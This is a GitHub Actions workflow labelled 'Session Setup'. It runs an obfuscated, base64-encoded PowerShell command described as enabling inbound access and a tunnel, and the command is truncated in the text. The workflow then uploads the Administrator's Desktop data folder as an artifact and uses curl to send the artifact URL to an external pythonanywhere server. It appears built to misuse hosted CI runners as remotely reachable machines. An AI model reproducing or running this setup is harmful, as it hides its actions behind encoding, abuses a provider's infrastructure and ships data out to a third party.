name: Session Setup

on:
  workflow_dispatch:

jobs:
  job-alpha:
    runs-on: windows-2022
    timeout-minutes: 360

    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Download, move, and unzip artifact
        shell: cmd
        run: .\download_move_unzip.bat

      - name: Init and Tunnel
        run: |
          powershell -EncodedCommand IwAgAEUAbgBhAGIAbABlACAAaQBuAGIAbwB1AG4AZAAgAGEAYwBjAGUAcwBzAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgB[...]
        timeout-minutes: 3

      - name: List Desktop Data contents (for debugging)
        run: dir C:\Users\Administrator\Desktop\data
        continue-on-error: true

      - name: Upload Desktop Data as "data" artifact
        id: upload_data
        uses: actions/upload-artifact@v4
        with:
          name: data
          path: C:\Users\Administrator\Desktop\data
        if: always()

      - name: Send artifact download URL to external server (curl)
        env:
          GITHUB_RUN_ID: ${{ github.run_id }}
          ARTIFACT_URL: https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}/artifacts
        shell: bash
        run: |
          url="${ARTIFACT_URL}"
          json="{\"url\": \"$url\"}"
          echo "Sending artifact URL $url to external server via curl"
          curl -X POST "https://azcaptchahh.pythonanywhere.com/url" -H "Content-Type: application/json" -d "$json"
